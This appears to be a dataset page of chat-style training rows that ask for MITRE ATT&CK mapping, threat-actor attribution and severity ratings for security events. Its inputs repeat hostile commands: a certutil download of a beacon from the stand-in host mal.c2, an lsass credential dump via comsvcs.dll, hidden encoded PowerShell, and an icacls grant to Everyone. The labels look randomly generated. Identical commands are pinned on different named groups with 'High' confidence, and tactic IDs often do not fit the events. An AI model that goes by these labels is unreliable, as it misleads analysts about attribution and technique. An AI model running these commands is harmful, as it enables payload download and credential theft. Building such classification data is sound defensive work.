messages listlengths 2 2 |
|---|
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-8MXE34O46R)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Execution, Defense Evasion, Privilege Escalation",
"role": "user"
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.161.76.7",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA000... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"conf... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via Exploitation for Client Execution.",
"role": "user"
},
{
"content": "{\"ta... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-XGIC5BEISP)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Initial Access",
"role": "user"
},
{
"content... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.008\", \"T1546\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.26.205.35",
"role": "user"
},
{
"content": "{\"tactics\": [\"T... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.54.97.178",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0040\", \"TA004... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.95.201.117",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-77QH6I3GJ2)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\": \"C... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-UP71X1BQW6)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"co... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: InvisiMole has disguised its droppers as legitimate software or documents, matching their original names and locations, and saved its files as mpr.dll in the Windows folder.",
"role": "user"
},
{
"content... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confide... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: TeamTNT has used an IRC bot for C2 communications.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoo... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.159.77.229",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0040\"], \"techniqu... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1772 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.48.54.240",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0007\"], \"techniques\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.22.101.197",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0007\"], \"technique... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1812 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.5.34.89",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-BXSJ4W6LLD)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Lateral Movement, Command and Control",
"role": "u... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence\": \"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: DarkWatchman has used Base64 to encode PowerShell commands.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: GeminiDuke collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder,... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Shamoon can download an executable to run on the victim.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: APT3 will identify Microsoft Office documents on the victim's computer.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Timezone Check The Trojan check to see if the system is configured (“DaylightName”) with one of the following time zones: Arabic Daylight Time (UTC+3) Arab Daylight Time (UTC+3) Arabian Daylight Time (UTC+4) Middle... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.30.67.97",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1195 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.175.27.148",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0004\"],... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.4.148.240",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"te... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1375 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.150.188.150",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0003\", \"TA0006\"], \"t... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2055 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.57.71.218",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniq... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: However, in order to kick off the execution of the malware the attacker uses a batch script which executes the malware, but the batch script does more than simply initiate execution of the malware",
"role": "user... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-QSJ19FP1P6)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery, Exfiltration, Credential Access",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-LTB2DKVH0I)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control, Lateral Movement",
"role": "user"
},
{
"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence\": \"Hig... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-IWWVBWUWBO)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance, Credential Access, Lateral Movement",
"role": "user"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 523 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3063 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confid... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-9MM25C320C)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Extreme\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": \"H... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.50.12.128",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1098.... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-UC1LFS7AMS)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Defense Evasion, Execution",
"role": "user"
},
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: APT32 has obtained and used tools such as Mimikatz and Cobalt Strike, and a variety of other open-source tools from GitHub.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2296 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.62.17.102",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0043\", \"TA0006\"], \"techni... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-GCXC152JPG)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Collection, Lateral Movement",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The \"Uploader\" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniqu... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-4WKO3MH3YC)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-JJOPZJHM5F)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Impact",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.180.252.69",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-YQ4WU99QQN)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Impact, Reconnaissance",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-WLY5NOOZ4F)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Discovery, Collection",
"role": "user"
},
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on t... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2672 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.188.184.123",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-PRK0XG5YTN)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"High\"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.94.165.128",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0008\"], \"techniq... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Sp... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 810 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": \... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: OilRig has used tools to identify if a mouse is connected to a targeted system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1120\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Sys10 collects the computer name, OS versioning information, and OS install date and sends the information to the C2.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.99.158.176",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2752 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidenc... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 647 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confiden... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-1CZB37P85J)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Command and Control",
"role": "user"
},
{
"content":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-IL3RKCPP7P)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Discovery, Command and Control",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-76V1EAPO5V)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Credential Access, Persistence, Defense Evasion",
"role": "user"
}... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: DLL side loading has been used to maintain persistence on the compromised system",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"TA0005\"], \"techniques\": [\"T1574.002\", \"T15... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: BLUELIGHT can check to see if the infected machine has VM tools running.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\": [\"T1497\", \"T1497.001\"]}",
"role":... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2250 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.29.124.5",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniqu... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1082 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.74.137.100",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1059.001\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2487 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.132.201.215",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1059.00... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: APT37 has used Windows DDE for execution of commands and a malicious VBS.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1559\", \"T1559.002\"]}",
"role": "assistant... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: icacls . /grant Everyone:F /T /C /Q",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1222\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.147.255.240",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: overwrite or delete MBR in same sentence",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561\", \"T1561.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-C2L5A0URFP)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"severity... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0005\"], \"techniques\": [\"T1542... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-HLES0QNEY9)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Execution, Impact",
"role": "user"
},
{
"content": ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.56.243.154",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0008\", \"TA0001\"], \"t... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-UH88DRFAC0)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\": \"High\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI.",
"role": "user"
},
{
"c... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3825 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.35.72.68",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"],... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: These loader instructions can be examined for individual binaries or frameworks using the otool -l command.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"TA0005\"], \"techniqu... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Bandook has used malicious VBA code against the target system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.005\", \"T1059\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-X24NCT8U7M)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Collection",
"role": "user"
},
{
"content... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3074 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"conf... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.34.170.82",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0011... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-AIQMTAPT7A)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence, Discovery, Privilege Escalation",
"role": "user"
},
{
"c... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547\", \"T1547.010\"]}",
"role": "assi... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.